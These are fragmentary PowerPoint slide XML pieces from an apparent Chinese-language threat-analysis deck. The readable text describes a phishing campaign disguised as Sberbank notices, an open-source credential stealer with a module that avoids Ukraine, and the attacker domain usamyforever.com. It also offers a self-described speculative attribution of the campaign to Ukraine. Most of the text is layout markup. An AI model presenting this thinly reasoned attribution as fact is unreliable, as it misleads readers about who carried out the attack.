              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>功能为删除自身所有相关文件，不再继续攻击</a:t>
            </a:r>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222</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25188781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223</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15217839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224</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84517629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225</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110749376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通过对本次攻击活动中使用的文件、域名等信息进行关联分析发现：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、本次攻击活动中攻击者将钓鱼邮件伪装为俄罗斯联邦储蓄银行官方通知，判断本次攻击活动的目标为俄罗斯。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、根据使用的诱饵文档创建时间，推测本次攻击活动时间大概为三月末，这个时间点刚好是俄罗斯调动装甲军队前往俄罗斯与乌克兰的边境，俄乌冲突升级。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、本次攻击活动使用了开源的窃密木马，攻击者在其中加入了规避乌克兰地区的模块。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、攻击者使用的域名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>usamyforever.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，译为“我永远的美国”。美国与乌克兰一直保持着亲切友好的战略关系。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>综合以上因素，推测本次事件可能为乌克兰针对俄罗斯的一次窃密行动。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E46A9642-FD4A-45CC-9F4F-8E10AB9AB4AA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>226</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1369455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 name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2438400"/>
            <a:ext cx="9009063" cy="1052513"/>
            <a:chOff x="0" y="1536"/>
            <a:chExt cx="5675" cy="663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3"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algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>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en-US">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4"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algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>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defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:endParaRPr>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lgn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>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lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4108" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1828800"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4109"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fld id="{1C61395C-8CDD-4FA2-ADB5-FD6889F54024}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C1C1C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="1C1C1C"/>
              </a:solidFill>
            </a:endParaRPr>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solidFill>
                <a:srgbClr val="1C1C1C"/>
              </a:solidFill>
            </a:endParaRPr>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19E74429-26DC-471E-9251-C4807B21DCEF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="1C1C1C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="1C1C1C"/>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a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CB3E5F7E-5148-4CB2-963A-95C37528F550}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>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EF68ED92-367B-4CD8-A26C-4E6248EAD48D}"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73875" y="142875"/>
            <a:ext cx="2070100" cy="55260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58813" y="142875"/>
            <a:ext cx="6062662" cy="55260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a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E565DC17-A35B-464B-A9AB-82DCA891CFF2}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>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CBA975A5-F217-4B48-B315-600F055D9787}"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lnSpc>
                <a:spcPts val="3400"/>
              </a:lnSpc>
              <a:defRPr b="0" baseline="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPts val="3400"/>
              </a:lnSpc>
              <a:defRPr b="0" baseline="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPts val="3400"/>
              </a:lnSpc>
              <a:defRPr b="0" baseline="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPts val="3400"/>
              </a:lnSpc>
              <a:defRPr b="0" baseline="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPts val="3400"/>
              </a:lnSpc>
              <a:defRPr b="0" baseline="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="020106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标题 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>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fld id="{13EAD5F1-67B5-4A0D-ABC1-AB8E7ABAD35E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{65EB7420-10C5-4439-A879-6C64816B7E29}"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58813" y="155416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1213" y="155416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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8777064C-0A55-4E07-B965-6C3D3728ABB2}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>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6B28E056-97FC-4A70-8131-E02F6583BF82}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E8AED8A2-82FC-4DC1-9863-2A50613A6AE6}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BBFD273C-C71A-40AC-9777-8B20B0D93BC7}"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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{075295FB-9049-4B10-8132-A2704FC040E4}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3782B63A-4FE1-4D96-8285-FCAE99EA7890}"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fld id="{27E94A6A-DBE8-4CE6-9619-41C62789DE7E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>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B733275C-2774-4B25-97E7-7065F970E90C}"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fld id="{00651A7E-C721-4544-8D2F-3546C0565F84}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2C21E245-20D5-4D11-AD9A-5B593160C07A}"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ltGray">
          <a:xfrm>
            <a:off x="417513" y="439738"/>
            <a:ext cx="438150" cy="474662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="800100" y="439738"/>
            <a:ext cx="328613" cy="47466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defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="541338" y="862013"/>
            <a:ext cx="422275" cy="474662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3077" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="911225" y="862013"/>
            <a:ext cx="368300" cy="47466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zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3078" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="127000" y="788988"/>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defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3079" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="762000" y="331788"/>
            <a:ext cx="31750" cy="1052512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3080" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="442913" y="1122363"/>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lang="zh-CN" altLang="zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150938" y="142875"/>
            <a:ext cx="7793037" cy="95885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34" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="658813" y="1554163"/>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083" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="6348413"/>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kumimoji="0" sz="1400" b="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2812D72D-DA04-4C9C-9A6E-C01386CD88CE}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2021/11/28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3084" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="6348413"/>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400" b="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3085" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="6348413"/>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400" b="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{38C58080-A4A9-4607-B318-5D24794E2C9C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3089" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="539750" y="6332538"/>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lang="zh-CN" altLang="zh-CN" sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3090" name="Line 18"/>
          <p:cNvSpPr>
